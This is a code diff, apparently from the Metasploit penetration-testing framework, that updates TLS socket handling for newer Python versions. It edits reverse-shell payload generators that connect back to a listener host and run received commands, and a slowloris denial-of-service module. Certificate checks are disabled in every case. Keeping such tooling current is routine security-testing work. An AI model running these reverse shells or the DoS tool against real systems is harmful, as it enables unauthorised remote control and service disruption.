Fix ssl.wrap_socket compatibility with Python 3.13+

lib/msf/core/payload/python/reverse_tcp_ssl.rb

@@ -44,12 +44,19 @@ def supports_ssl?
   end
 
   def generate_reverse_tcp_ssl(opts={})
-    # Set up the socket
+    # Set up the socket - use ssl.SSLContext for Python 3.2+ compatibility
+    # Fallback to ssl.wrap_socket for Python 2.x
     cmd  = "import zlib,base64,ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
     if opts[:retry_wait].blank? # do not retry at all (old style)
       cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
       cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
-      cmd << "s=ssl.wrap_socket(so)\n"
+      cmd << "if hasattr(ssl,'SSLContext'):\n"
+      cmd << "\tctx=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n"
+      cmd << "\tctx.check_hostname=False\n"
+      cmd << "\tctx.verify_mode=ssl.CERT_NONE\n"
+      cmd << "\ts=ctx.wrap_socket(so)\n"
+      cmd << "else:\n"
+      cmd << "\ts=ssl.wrap_socket(so)\n"
     else
       if opts[:retry_count] > 0
         cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
@@ -59,7 +66,13 @@ def generate_reverse_tcp_ssl(opts={})
       cmd << "\ttry:\n"
       cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
       cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
-      cmd << "\t\ts=ssl.wrap_socket(so)\n"
+      cmd << "\t\tif hasattr(ssl,'SSLContext'):\n"
+      cmd << "\t\t\tctx=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n"
+      cmd << "\t\t\tctx.check_hostname=False\n"
+      cmd << "\t\t\tctx.verify_mode=ssl.CERT_NONE\n"
+      cmd << "\t\t\ts=ctx.wrap_socket(so)\n"
+      cmd << "\t\telse:\n"
+      cmd << "\t\t\ts=ssl.wrap_socket(so)\n"
       cmd << "\t\tbreak\n"
       cmd << "\texcept:\n"
       if opts[:retry_wait].to_i <= 0
@@ -84,5 +97,4 @@ def handle_intermediate_stage(conn, payload)
 
 end
 
-end
-
+end

modules/auxiliary/dos/http/slowloris.py

@@ -79,7 +79,13 @@ def init_socket(host, port, use_ssl=False, rand_user_agent=True):
     s.settimeout(4)
 
     if use_ssl:
-        s = ssl.wrap_socket(s)
+        if hasattr(ssl, 'SSLContext'):
+            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
+            ctx.check_hostname = False
+            ctx.verify_mode = ssl.CERT_NONE
+            s = ctx.wrap_socket(s)
+        else:
+            s = ssl.wrap_socket(s)
 
     s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
 

modules/payloads/singles/cmd/unix/reverse_python_ssl.rb

@@ -51,11 +51,18 @@ def generate(_opts = {})
   def command_string
     cmd = ''
     dead = Rex::Text.rand_text_alpha(2)
-    # Set up the socket
+    # Set up the socket - use ssl.SSLContext for Python 3.2+ compatibility
+    # Fallback to ssl.wrap_socket for Python 2.x
     cmd += "import socket,subprocess,os,ssl\n"
     cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
     cmd += "so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
-    cmd += "s=ssl.wrap_socket(so)\n"
+    cmd += "if hasattr(ssl,'SSLContext'):\n"
+    cmd += "\tctx=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n"
+    cmd += "\tctx.check_hostname=False\n"
+    cmd += "\tctx.verify_mode=ssl.CERT_NONE\n"
+    cmd += "\ts=ctx.wrap_socket(so)\n"
+    cmd += "else:\n"
+    cmd += "\ts=ssl.wrap_socket(so)\n"
     # The actual IO
     cmd += "#{dead}=False\n"
     cmd += "while not #{dead}:\n"
@@ -70,4 +77,4 @@ def command_string
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | #{datastore['PythonPath']}  -"
     end
   end
-end
+end

modules/payloads/singles/python/shell_reverse_tcp_ssl.rb

@@ -48,7 +48,13 @@ def command_string
       import ssl
       so=s.socket(s.AF_INET,s.SOCK_STREAM)
       so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
-      so=ssl.wrap_socket(so)
+      if hasattr(ssl,'SSLContext'):
+        ctx=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
+        ctx.check_hostname=False
+        ctx.verify_mode=ssl.CERT_NONE
+        so=ctx.wrap_socket(so)
+      else:
+        so=ssl.wrap_socket(so)
       while True:
       	d=so.recv(1024)
       	if len(d)==0:
@@ -60,4 +66,4 @@ def command_string
 
     py_create_exec_stub(cmd)
   end
-end
+end